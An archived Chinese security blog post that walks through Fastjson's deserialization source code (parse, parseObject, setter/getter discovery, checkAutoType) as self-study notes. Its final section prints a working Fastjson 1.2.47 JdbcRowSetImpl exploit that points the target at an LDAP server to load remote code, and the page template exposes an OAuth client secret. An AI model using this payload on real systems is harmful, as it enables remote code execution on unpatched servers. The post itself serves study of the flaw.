<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Drunkbaby">
    
    <title>
        
            Java反序列化Fastjson篇05-写给自己看的一些源码深入分析 |
        
        Drunkbaby&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/avatar.svg">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/brands.min.css">
    
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"drun1baby.github.io","root":"/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066cc","logo":"/images/logo.svg","favicon":"/images/avatar.svg","avatar":"/images/avatar.svg","font_size":"15px","font_family":null,"hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"且将新火试新茶，诗酒趁年华","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"comment":{"enable":true,"use":"gitalk","valine":{"enable":true,"appid":"mCIu9X4iLP3I0GikUoetB9bV-9Nh9j0Va","appkey":"ermlV1eoB1YODT088EdXjo6C","placeholder":"just go go","background":"/images/comment_bg.png","count":true},"gitalk":{"github_id":"Drun1baby","github_admins":null,"repository":"gitalk-restore","client_id":"e5b5e5c0ba918eb3d3c4","client_secret":"a0ac0e6f2078095bce9291f42acd13b67e059dff","proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.8"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"version":"3.7.3"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Drunkbaby's Blog" type="application/atom+xml">
</head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               Drunkbaby&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">

                

                    <div class="fade-in-down-animation">
    <div class="post-page-container border-box">

        <div class="article-content-container border-box">

            <div class="article-title">
                <span class="title-hover-animation">Java反序列化Fastjson篇05-写给自己看的一些源码深入分析</span>
            </div>

            
                <div class="article-header border-box">
                    
                        <div class="avatar-box border-box">
                            <img src="/images/avatar.svg">
                        </div>
                    
                    <div class="info-box">
                        <div class="author">
                            <span class="name">Drunkbaby</span>
                            
                                <span class="author-label">Lv6</span>
                            
                        </div>
                        <div class="meta-info border-box">
                            

<div class="article-meta-info-container border-box post">
    <div class="article-meta-info border-box">
        


        
            <span class="meta-info-item article-create-date">
                <i class="icon fa-solid fa-calendar-check"></i>&nbsp;
                <span class="pc">2022-10-19 20:55:46</span>
                <span class="mobile">2022-10-19 20:55</span>
            </span>

            <span class="meta-info-item article-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="pc">2023-03-29 22:00:41</span>
            </span>
        

        
            <span class="meta-info-item article-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul>
                    
                            <li class="category-item">
                                
                                <a href="/categories/Java/">Java</a>
                            </li>
                        
                    
                </ul>
            </span>
        

        
            <span class="article-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul>
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/Java/">Java</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item article-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>2.4k 字</span>
            </span>
        
        
            <span class="meta-info-item article-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>8 分钟</span>
            </span>
        
        
            <span class="meta-info-item article-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                

                <p>写给自己看的 Fastjson 源码深入分析</p>
<span id="more"></span>
<h1 id="Java-反序列化-Fastjson-篇-05-写给自己看的一些源码深入分析"><a href="#Java-反序列化-Fastjson-篇-05-写给自己看的一些源码深入分析" class="headerlink" title="Java 反序列化 Fastjson 篇 05-写给自己看的一些源码深入分析"></a>Java 反序列化 Fastjson 篇 05-写给自己看的一些源码深入分析</h1><h2 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h2><p>写这篇文章的目的是在学习 SnakeYaml 的时候发现自己的 Fastjson 功底并不牢固，很多地方只是学习了其他师傅的文章，而自己并未进行源码阅读，想起来也是非常惭愧……趁着这个机会自己好好过一遍。</p>
<h2 id="0x02-Fastjson-原理浅析"><a href="#0x02-Fastjson-原理浅析" class="headerlink" title="0x02 Fastjson 原理浅析"></a>0x02 Fastjson 原理浅析</h2><p>Fastjson反序列化采用两个反序列化的方法，它们分别是  </p>
<p><code>JSON.parseObject()</code><br><code>JSON.parse()</code></p>
<p><code>parseObject</code>：返回 <code>fastjson.JSONObject</code> 类</p>
<p><code>parse</code> ：返回我们的类 <code>User</code></p>
<p>可以发现在都是默认输入的情况下，<code>parseObject</code> 会返回 parseObject，parse 则会返回我们的 Student 类</p>


<p>但是我们可以通过在 parseObject 参数中传入类，从而达到和 parse 相同的效果</p>
<p><code>parseObject(input,Object.class)</code> （这里同样可以传入 Student.class）, 发现此时也变成了 Student 类</p>


<p>这里我们深入看一下 JSON 类里面的 parseObject 和 parse 方法</p>


<ul>
<li>可以看到此处，parse 方法和 parseObject 方法被重写了很多，我们挑一些使用到的方法看一看。因为参数都是大同小异。</li>
</ul>
<h3 id="parse-方法解析"><a href="#parse-方法解析" class="headerlink" title="parse 方法解析"></a>parse 方法解析</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">parse</span><span class="params">(String text, Feature... features)</span> &#123;  </span><br><span class="line">    <span class="type">int</span> <span class="variable">featureValues</span> <span class="operator">=</span> DEFAULT_PARSER_FEATURE;  </span><br><span class="line">    <span class="keyword">for</span> (Feature feature : features) &#123;  </span><br><span class="line">        featureValues = Feature.config(featureValues, feature, <span class="literal">true</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">  </span><br><span class="line">    <span class="keyword">return</span> parse(text, featureValues);  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>传入两个参数，一个是 <code>String text</code>，这是我们要拿去反序列化解析的字符串。另外一个参数是 Feature，Feature 并没有什么特别大的用处，如果没有选择该 Feature，那么在反序列的过程中，FastJson 会自动把下划线命名的 Json 字符串转化到驼峰式命名的 Java 对象字段中。</p>
<p>在自己调试打断点的过程当中，发现 <code>DefaultJSONParser#parseObject</code> 里面有一个 <code>TypeUtils.loadClass()</code>，一直想不起来在哪条链子里面见到过，如果有见到过的师傅请提醒一下我；总感觉这里有点攻击隐患的味道在。</p>


<blockquote>
<p>这里我自己调试了一遍代码，发现有的东西和   Mi1k7ea 师傅讲的似乎有些许区别。</p>
</blockquote>
<p>我在调试的时候发现 <code>parse()</code> 方法的反序列化实际上也是去到了 <code>DefaultJSONParser#parseObject</code> 里面。而 Mi1k7ea 师傅的意思是，调用 <code>parseObject()</code> 方法的时候实际上是调用了 <code>parse()</code> 方法，其实明显不是这样。两者都会走到 <code>DefaultJSONParser#parseObject</code></p>
<h3 id="parseObject-方法解析"><a href="#parseObject-方法解析" class="headerlink" title="parseObject 方法解析"></a>parseObject 方法解析</h3><ul>
<li>比较重要的是第二个参数，也就是要求我们传入 <code>Object.class</code>，或者说，对于很多开发者，为了省事儿，会在第二个参数传入 <code>Object.class</code></li>
</ul>
<p>具体的就不再赘述了，在实际开发场景当中 <code>parseObject()</code> 用到的非常多，基本全部都是。下面我们详细看一看为什么 Fastjson 在反序列化的时候会自动调用 getter&#x2F;setter，同时也再给自己过一遍 Fastjson 反序列化的流程。</p>
<h3 id="为什么-Fastjson-在反序列化的时候会自动调用-getter-x2F-setter"><a href="#为什么-Fastjson-在反序列化的时候会自动调用-getter-x2F-setter" class="headerlink" title="为什么 Fastjson 在反序列化的时候会自动调用 getter&#x2F;setter"></a>为什么 Fastjson 在反序列化的时候会自动调用 getter&#x2F;setter</h3><p>断点下在 <code>DefaultJSONParser#parseObject</code> 下，因为前面的过程都是在互相调用，可以直接看这里的业务层。</p>
<p>开始调试，走到第 639 行这里，跟进一下 <code>derializer.deserialze()</code>，<code>deserialze()</code> 方法做的业务比较特殊：如果传进来要解析的类是 Array 数组类，就直接进行 <code>newInstance()</code> 的实例化，并且将数组数据返回。</p>
<p>如果传进来的不是 Array 数组类，而是 Object 类，或是不可以反序列化的类，就会走到下一个业务方法的 <code>parseObject()</code> 里面。</p>


<p>继续往下跟，会走到新的 <code>DefaultJSONParser#parseObject</code> 下</p>


<p>这一个 <code>DefaultJSONParser#parseObject</code> 的业务流程是先做了一个基础的判断，判断是去判断 token 是否相同，关于 Fastjson Token 可以看这篇文章，因为这位师傅讲的非常清晰，我这里就不做自我总结了，这个东西看懂就可以。</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45854465/article/details/120626835" >https://blog.csdn.net/qq_45854465/article/details/120626835<i class="fas fa-external-link-alt"></i></a></p>
<p>继续往下，在 322 行这里的 <code>TypeUtils.loadClass()</code> 可以提一嘴，我之前一直觉得这个地方是有攻击潜力的，包括在下面也看到了 <code>clazz.newInstance()</code> 的代码，一度以为可以打。并且此处的<code>config.getDefaultClassLoader()</code> 我觉得是可控的，在问了 Y4tacker 爷之后，Y4 师傅说这里是没用的，因为只是实例化了一个类。</p>
<p>后续我找到了为啥看这个地方很眼熟，是因为 Fastjson 1.2.25 版本当中，把 <code>TypeUtils.loadClass()</code> 换成了 <code>checkAutoType()</code>，而 <code>TypeUtils.loadClass()</code> 的代码中是有逻辑问题的，因此可以造成些许绕过。</p>
<p>还有的是 1.2.47 的那个通杀 EXP，在 1.2.48 版本之前的 EXP 都是能够通过 <code>TypeUtils.loadClass()</code> 来绕过的，因为它能会把第一次 <code>@type</code> 的结果缓存到 Map 当中。</p>
<p>重新回到代码里面，<code>DefaultJSONParser</code> 类的 367 行，把 <code>deserializer</code> 的值拿出来，赋给 ObjectDeserializer deserializer，跟进一下</p>


<p>跟过来是一个方法，继续往下跟进具体的业务方法</p>


<p>前面都是做了很多数据处理，到第 461 行这里，跟进。</p>


<p>继续往下走，终于才能看到我们的主角登场了 <code> JavaBeanInfo#build</code></p>


<h4 id="JavaBeanInfo-build"><a href="#JavaBeanInfo-build" class="headerlink" title="JavaBeanInfo#build"></a>JavaBeanInfo#build</h4><p><code>JavaBeanInfo#build</code> 先通过反射获取我们 <code>@type</code> 里面要去反序列化的那个类的一些基本信息。</p>
<p>继续往下走，里面有一个 for 循环，当中把 <code>@type</code> 类对应的 Methods 全部拿出来。</p>


<p>首先会遍历 methods 中所有的 method 方法，然后会经过四个判断，只要符合任意一个判断就会触发 continue 跳出当前循环，所以必须要满足下面列出来的五个方法才能顺利执行，否则就会跳出当前循环（ps：这里和代码中的判断要反一反）</p>
<ol>
<li>方法名长度不能小于4</li>
<li>不能是静态方法</li>
<li>返回的类型必须是void 或者是自己本身</li>
<li>传入参数个数必须为1</li>
<li>方法开头必须是set</li>
</ol>


<p>最后将可用的 setter 方法放到 fieldList 里面，如图</p>


<p>此时，在 fieldList 当中，我们有三个 FieldInfo，这也就是我们的三个 setter 方法。</p>
<p>下面我们来看 getter 方法是如何被获取到的，其实是大同小异。首先会遍历 methods 中的每个方法，同样的如果要顺利执行下去需要符合四个条件</p>
<ol>
<li>方法名长度不小于4</li>
<li>不能是静态方法</li>
<li>方法名要 get 开头同时第四个字符串要大写</li>
<li>方法返回的类型必须继承自 Collection Map AtomicBoolean AtomicInteger AtomicLong</li>
<li>传入的参数个数需要为 0</li>
</ol>


<p>同样的如果符合上面要求的就会添加到 FieldInfo 中，在我 Student 类里面，只有 <code>gqetProperties</code> 方法符合预期，所以只获取到了 <code>getProperties</code> 方法</p>


<p>最后返回 JavaBeanInfo，beanInfo 中会存放我们类中的各种信息</p>


<p>后续，在 <code>JavaBeanDeserializer#deserialze</code> 方法中，对 FieldInfo 进行循环遍历，将每一个可用的 setter 与 getter 方法拿出来，具体的触发流程是这样的：</p>
<p>第 593 行，<code>fieldDeser.setValue(object, fieldValue);</code>，跟进之后是反射调用方法的语句</p>


<ul>
<li>至此，分析过程全部结束</li>
</ul>
<h2 id="0x03-Fastjson-其他点解析-持续补充"><a href="#0x03-Fastjson-其他点解析-持续补充" class="headerlink" title="0x03 Fastjson 其他点解析(持续补充)"></a>0x03 Fastjson 其他点解析(持续补充)</h2><h3 id="关于-Feature-SupportNonPublicField"><a href="#关于-Feature-SupportNonPublicField" class="headerlink" title="关于 Feature.SupportNonPublicField"></a>关于 Feature.SupportNonPublicField</h3><p>由于该字段在fastjson1.2.22版本引入，所以只能影响1.2.22-1.2.24</p>
<p>在前面的Evil类中，可以发现我们的setter和getter方法是public的，但是如果有时候遇到private的情况我们就不能进行反序列化了，会返回 null</p>
<p>这时我们可以添加<code>SerializerFeature.WriteClassName</code> 参数，这样私有属性 <code>_bytecodes</code> ，<code>_tfactory</code>就会被fastjson正常反序列化了</p>
<h3 id="关于-checkAutoType"><a href="#关于-checkAutoType" class="headerlink" title="关于 checkAutoType"></a>关于 checkAutoType</h3><ul>
<li>这其实是从 Fastjson 1.2.24 版本之后出来的修复点。</li>
</ul>
<p>checkAutoType() 函数就是使用黑白名单的方式对反序列化的类型继续过滤，acceptList 为白名单（默认为空，可手动添加），denyList 为黑名单（默认不为空）。</p>
<p>默认情况下，autoTypeSupport 为 False，即先进行黑名单过滤，遍历 denyList，如果引入的库以 denyList 中某个 deny 开头，就会抛出异常，中断运行。</p>
<p>true: 先白名单过滤，匹配成功即可加载该类，否则再黑名单过滤<br>false: 先黑名单过滤，再白名单过滤，若白名单匹配上则直接加载该类，否则报错</p>
<h2 id="0x04-Fastjson-多-type-的通杀型-EXP-调试"><a href="#0x04-Fastjson-多-type-的通杀型-EXP-调试" class="headerlink" title="0x04 Fastjson 多 @type 的通杀型 EXP 调试"></a>0x04 Fastjson 多 @type 的通杀型 EXP 调试</h2><p>起因还是因为 SnakeYaml 学习过程中发现的这个问题，当时只是跟着 Mi1k7ea 师傅过了一遍，并未进行分析，有点后悔，现在自己再重新回来复习一遍。</p>
<p>EXP</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JdbcRowSetImplPoc</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] argv)</span>&#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">payload</span>  <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;a\&quot;:&#123;\&quot;@type\&quot;:\&quot;java.lang.Class\&quot;,\&quot;val\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;&#125;,&quot;</span></span><br><span class="line">                + <span class="string">&quot;\&quot;b\&quot;:&#123;\&quot;@type\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;,&quot;</span></span><br><span class="line">                + <span class="string">&quot;\&quot;dataSourceName\&quot;:\&quot;ldap://localhost:1389/Exploit\&quot;,\&quot;autoCommit\&quot;:true&#125;&#125;&quot;</span>;</span><br><span class="line">        JSON.parse(payload);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>开始调试，用的 Fastjson 版本是 1.2.47 的；</p>
<p>简单说一下原理，具体的可以看 <a class="link"   target="_blank" rel="noopener" href="http://localhost:4000/2022/08/08/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Fastjson%E7%AF%8703-Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/#toc-heading-20" >Java反序列化Fastjson篇03-Fastjson各版本绕过分析<i class="fas fa-external-link-alt"></i></a></p>
<p>在运行完毕后会返回一个 obj，这个 obj 里面是类名以及其对应的属性值，这个属性值会保存到 map 里面，如图</p>


<p>这个 map 放了原本的值，也就是我们说的缓存，可以通过 <code>TypeUtils.getClassFromMapping()</code> 来加载，太妙了，太妙了。我之前看 snakeYaml 也有类似的 map，但是并未进行操作，到时候可以看一看。</p>

            </div>

            
                <div class="post-copyright-info">
                    
<div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li class="post-title">
            <span class="type">本文标题</span>：<span class="content">Java反序列化Fastjson篇05-写给自己看的一些源码深入分析</span>
        </li>
        <li class="post-author">
            <span class="type">本文作者</span>：<span class="content">Drunkbaby</span>
        </li>
        <li class="post-time">
            <span class="type">创建时间</span>：<span class="content">2022-10-19 20:55:46</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2022/10/19/Java反序列化Fastjson篇05-写给自己看的一些源码深入分析/</span>
        </li>
        <li class="post-license">
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
    <div class="copy-copyright-info flex-center tooltip" data-content="复制版权信息" data-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Java/"><i class="icon fas fa-hashtag"></i>Java</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2022/10/25/welcome-to-use-hexo-theme-keep/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item text-ellipsis">Welcome to use Hexo Theme Keep</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2022/10/16/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8B-SnakeYaml-%E9%93%BE/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item text-ellipsis">Java反序列化之 SnakeYaml 链</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
                


    <div class="comments-container">
        <div id="comments-anchor"></div>
        <div class="comment-area-title">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        
            

    <div class="gitalk-comment-container">
        <div id="gitalk-container"></div>
        <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk/dist/gitalk.css">
        <script data-pjax src="//cdn.jsdelivr.net/npm/gitalk/dist/gitalk.min.js"></script>
        <script data-pjax>
          function loadGitalk() {
            let __gitalk__pathname = decodeURI(location.pathname);
            const __gitalk__pathnameLength = __gitalk__pathname.length;
            const __gitalk__pathnameMaxLength = 50;
            if (__gitalk__pathnameLength > __gitalk__pathnameMaxLength) {
              __gitalk__pathname = __gitalk__pathname.substring(0, __gitalk__pathnameMaxLength - 3) + '...';
            }

            try {
              Gitalk && new Gitalk({
                clientID: 'e5b5e5c0ba918eb3d3c4',
                clientSecret: 'a0ac0e6f2078095bce9291f42acd13b67e059dff',
                repo: 'gitalk-restore',
                owner: 'Drun1baby',
                admin: 'Drun1baby',
                id: __gitalk__pathname,
                proxy: '',
                language: 'zh-CN'
              }).render('gitalk-container');
            } catch (e) {
              window.Gitalk = null;
            }
          }

          if ('true' === 'true') {
            const loadGitalkTimeout = setTimeout(() => {
              loadGitalk();
              clearTimeout(loadGitalkTimeout);
            }, 1000);
          } else {
            window.addEventListener('DOMContentLoaded', loadGitalk);
          }
        </script>
    </div>


        
    </div>





            
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Java-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-Fastjson-%E7%AF%87-05-%E5%86%99%E7%BB%99%E8%87%AA%E5%B7%B1%E7%9C%8B%E7%9A%84%E4%B8%80%E4%BA%9B%E6%BA%90%E7%A0%81%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90"><span class="nav-text">Java 反序列化 Fastjson 篇 05-写给自己看的一些源码深入分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E5%89%8D%E8%A8%80"><span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-Fastjson-%E5%8E%9F%E7%90%86%E6%B5%85%E6%9E%90"><span class="nav-text">0x02 Fastjson 原理浅析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#parse-%E6%96%B9%E6%B3%95%E8%A7%A3%E6%9E%90"><span class="nav-text">parse 方法解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#parseObject-%E6%96%B9%E6%B3%95%E8%A7%A3%E6%9E%90"><span class="nav-text">parseObject 方法解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88-Fastjson-%E5%9C%A8%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%97%B6%E5%80%99%E4%BC%9A%E8%87%AA%E5%8A%A8%E8%B0%83%E7%94%A8-getter-x2F-setter"><span class="nav-text">为什么 Fastjson 在反序列化的时候会自动调用 getter&#x2F;setter</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#JavaBeanInfo-build"><span class="nav-text">JavaBeanInfo#build</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-Fastjson-%E5%85%B6%E4%BB%96%E7%82%B9%E8%A7%A3%E6%9E%90-%E6%8C%81%E7%BB%AD%E8%A1%A5%E5%85%85"><span class="nav-text">0x03 Fastjson 其他点解析(持续补充)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8E-Feature-SupportNonPublicField"><span class="nav-text">关于 Feature.SupportNonPublicField</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8E-checkAutoType"><span class="nav-text">关于 checkAutoType</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-Fastjson-%E5%A4%9A-type-%E7%9A%84%E9%80%9A%E6%9D%80%E5%9E%8B-EXP-%E8%B0%83%E8%AF%95"><span class="nav-text">0x04 Fastjson 多 @type 的通杀型 EXP 调试</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2021</span>&nbsp;-&nbsp;2023
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Drunkbaby</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.7.3</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访问人数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">总访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
